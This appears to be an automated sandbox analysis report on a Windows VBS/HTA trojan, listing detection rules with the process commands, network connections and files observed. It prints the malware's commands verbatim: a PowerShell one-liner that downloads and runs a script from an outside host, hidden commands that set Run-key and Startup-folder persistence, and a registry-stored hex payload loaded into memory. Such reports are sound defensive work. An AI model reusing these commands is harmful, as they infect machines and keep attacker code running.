Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\wscript.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set XDMX = CreateObject("Microsoft.XMLDOM")Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: Set bs = CreateObject("ADODB.Stream")Jump to dropped file
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 23.105.131.191 5478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 166.62.121.61 443Jump to behavior
Wscript called in batch mode (surpress errors)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\RV_MUTEX
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.evad.winHTA@49/18@2/3
Creates files inside the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinationsJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\microsoft.vbsJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h........P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..h............t...B... '.h...h....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h.............3.h......|.L|.h.......j '.h...jC.e.L|.h.............7.h.......h..|..W@............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................L......v...................v..0.................Y...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0............W@........v0..................v..0.....................................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......................v0..................v..0.....................................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......#....W@........v0..................v..0.....................................#...........d...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......#..............v0..................v..0.....................................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......'....W@........v0..................v..0.................&...................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......'..............v0..................v..0................./...................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......+....W@........v0..................v..0.................=...................+...........\...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......+..............v0..................v..0.................F...................+...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......./...P.S.C.h.i.l.d.N.a.m.e. . .:. .R.u.n.................U.................../...........$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......./..............v0..................v..0.................^.................../...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......3...P.S.D.r.i.v.e. . . . . . .:. .H.K.C.U...............m...................3...........&...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......3..............v0..................v..0.................v...................3...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......7....W@........v0..................v..0.....................................7...........b...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......7..............v0..................v..0.....................................7...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......;....W@........v0..................v..0.....................................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......;..............v0..................v..0.....................................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................?.......@......v...................v..0.....................................?.......|.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......C..............vL..................v..0.....................................C.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......G..............vL..................v..0.....................................G.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............d...G...P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. .......G.......d...B...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h|.......P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..h..|.P.......d...B... '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h........P.S. .C.:.\.U.s.e.r.s.\.S.a.m. .T.a.r.w.e.l.l.\.D.e.s.k.t.o.p.>. ..hH.|.P*/.........B... '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h.............3.h......;.L|.h.......j '.h...j.n!.L|.h.............7.h.......h..;...@............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................L......v...................v..0.........0...D.......................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.............@........v0..................v..0.........0...D...*...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......................v0..................v..0.........0...D...3...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......#.....@........v0..................v..0.........0...D...A...................#...........d...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......#..............v0..................v..0.........0...D...J...................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......'.....@........v0..................v..0.........0...D.......................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......'..............v0..................v..0.........0...D.......................'...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......+.....@........v0..................v..0.........0...D.......................+...........\...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......+..............v0..................v..0.........0...D.......................+...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......./...P.S.C.h.i.l.d.N.a.m.e. . .:. .R.u.n.........0...D......................./...........$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0......./..............v0..................v..0.........0...D......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......3...P.S.D.r.i.v.e. . . . . . .:. .H.K.C.U.......0...D.......................3...........&...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......3..............v0..................v..0.........0...D.......................3...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......7.....@........v0..................v..0.........0...D.......................7...........b...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......7..............v0..................v..0.........0...D.......................7...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......;.....@........v0..................v..0.........0...D.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........0.......;..............v0..................v..0.........0...D.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................?.......@......v...................v..0.........0...D...)...................?.......|.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......C..............vL..................v..0.........0...D...6...................C.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........L.......G..............vL..................v..0.........0...D...C...................G.......,.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G...h.5.H......v...................v..0.........0...D...Q...................G...........R...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h.............3.h......#.L|.h.......j '.h...jg^..L|.h.............7.h.......h..#.`.3............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3.h....#........3.h....P.<.L|.h.......j '.h...j....L|.hd............7.h.......hP.<...J............. '.h...h....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...#.....J.x......v...................v..0.........L...(...Y...................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.../.....J.8......v...................v..0.........L...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.../.....J.x......v...................v..0.........L...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...;...e.i.n.g. .u.s.e.d. .b.y. .a.n.o.t.h.e.r. .p.r.o.c.e.s.s...".............;.......t...<...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...;.....J.x......v...................v..0.........L...(.......................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.0.........L...8.......................G.......t...$...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...G.....J.x......v...................v..0.........L...8...)...................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...S.....J.8......v...................v..0.........L...8...Q...................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...S.....J.x......v...................v..0.........L...8...l...................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l..._.....J.8......v...................v..0.........L...8......................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l..._.....J.x......v...................v..0.........L...8......................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...k...c.r.o.s.o.f.t...v.b.s.'.).)....v..0.........L...8.......................k.......t.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...k.....J.x......v...................v..0.........L...8.......................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...w.....J.8......v...................v..0.........L...8.......................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l...w.....J.x......v...................v..0.........L...8...5...................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.........J.8......v...................v..0.........L...8...]...............................f...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.........J.x......v...................v..0.........L...8...x...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l....... .J.8......v...................v..0.........L...8...............................t.......>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............l.........J.x......v...................v..0.........L...8.......................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........$...........0HE........v$..................v..0.........L...8...................................R...>..v........
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
